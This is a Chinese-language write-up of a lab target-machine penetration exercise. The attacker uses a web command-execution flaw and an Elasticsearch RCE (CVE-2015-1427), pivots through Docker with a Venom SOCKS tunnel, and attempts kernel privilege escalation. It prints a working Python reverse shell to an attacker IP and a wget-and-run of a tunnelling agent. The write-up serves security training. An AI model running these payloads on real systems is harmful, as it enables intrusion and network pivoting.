目录
1、配置网络
下载靶机,用kali打开,网络配置为NAT如下:
2、网络扫描
寻找靶机IP,这里靶机IP在eth1网卡上:
查看开放端口,发现5000端口
识别5000端口开放的服务,发现他是基于python2开发的一个web服务
3、Web信息收集
用浏览器访问:
使用xss payload没有成功:
4、Web 命令执行漏洞与反弹Shell
使用dirsearch扫描敏感目录,发现存在/admin路径:
使用python反弹shell,发现代码可以执行成功:
首先在kali上监听4445端口
再用以下代码进行反弹shell
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.129",4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
成功并发现是docker环境,输入ls /.dockerenv判断当前环境是否为docker容器:
发现是在docker环境下
5、后渗透
使用ip address发现内网网段
使用for i in $(seq 1 20); do ping -c 1 172.17.0.$i; done命令看内网存活主机,172.17.0.1-3为开放主机:
部署Venom内网穿透工具
在Kali主机Venom目录启动Python3 Http Server
启动Venom管理端,监听本地9999端口
靶机部署Venom客户端
wget -c http://192.168.10.129/agent_linux_x64
./agent_linux_x64 -rhost 192.168.10.129 -rport 9999
在Kali主机Venom管理端可以看到有主机上线,查看、控制Venom节点、启动socks隧道
5、挂SOCKS内网扫描
1.修改proxychains配置
vi /etc/proxychains4.conf
修改最后一行为:
socks5 127.0.0.1 1080
2.挂代理启动扫描,发现172.17.0.2存在9200端口
用浏览器访问9200端口,配置好代理才能打开
发现版本号为1.4.2,存在elasticsearch版本漏洞为rce漏洞CVE-2015-1427:
找到漏洞并复制到当前目录:
执行exp获得,找到密码并且解密:
因为之前探测开放了22端口,使用ssh远程登录1337hack登录成功:
6、Linux内核提权
1.uname -a 发现版本号对应漏洞:
2.移动到根目录:
3.gcc编译成exp:
4.靶机wget文件:
运行后发现靶机的系统上缺少所需版本的C库,所以exp无法运行,不是root也不能升级系统,也没有找到解决办法。。。。